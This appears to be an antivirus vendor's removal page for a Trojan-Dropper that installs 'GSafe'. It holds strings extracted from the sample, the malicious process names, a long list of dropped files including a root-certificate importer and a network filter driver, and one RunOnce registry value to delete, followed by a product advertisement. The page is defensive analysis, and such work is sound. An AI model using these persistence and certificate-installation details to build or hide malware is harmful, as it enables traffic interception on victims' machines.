%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    net.exe:352
    net1.exe:1880
    nfregdrv.exe:828
    setup.exe:1552
    41Ge4d.tmp:960
    Autoplay.exe:928
    %original file name%.exe:468
    GSafe.exe:1304
    8A9F8h.tmp:500

  2. Delete the original Trojan-Dropper file.
  3. Delete or disinfect the following files created/modified by the Trojan-Dropper:

    %Documents and Settings%\%current user%\Local Settings\Temp\is-IQ4JV.tmp\setup.tmp (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8DNHB5S8.tmp (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8A9F8h.tmp (20506 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\41Ge4d.tmp (1831 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-PVF17.tmp\_isetup\_shfoldr.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\Autoplay.exe (6720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\setup.exe (11547 bytes)
    %WinDir%\Temp\GS_RuleList.txt (154 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\gw10_rules[1].htm (154 bytes)
    %WinDir%\Temp\GSafe\SSL\GSafe Intermediate Certificate 2.cer (804 bytes)
    %WinDir%\Temp\GSafe\SSL\cert.db (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
    %System%\drivers\gfilterdrv.sys (56 bytes)
    %Program Files%\GSafe\ProtocolFilters.dll (38495 bytes)
    %Program Files%\GSafe\uninst.exe (313 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (104507 bytes)
    %Program Files%\GSafe\nfregdrv.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\SimpleSC.dll (1856 bytes)
    %Program Files%\GSafe\ssleay32.dll (12536 bytes)
    %Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nss3.tmp\ns4.tmp (6 bytes)
    %Program Files%\GSafe\nfapi.dll (4992 bytes)
    %Program Files%\GSafe\libeay32.dll (41192 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\gsafessl.cer (804 bytes)
    %Program Files%\GSafe\GSafe.exe (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now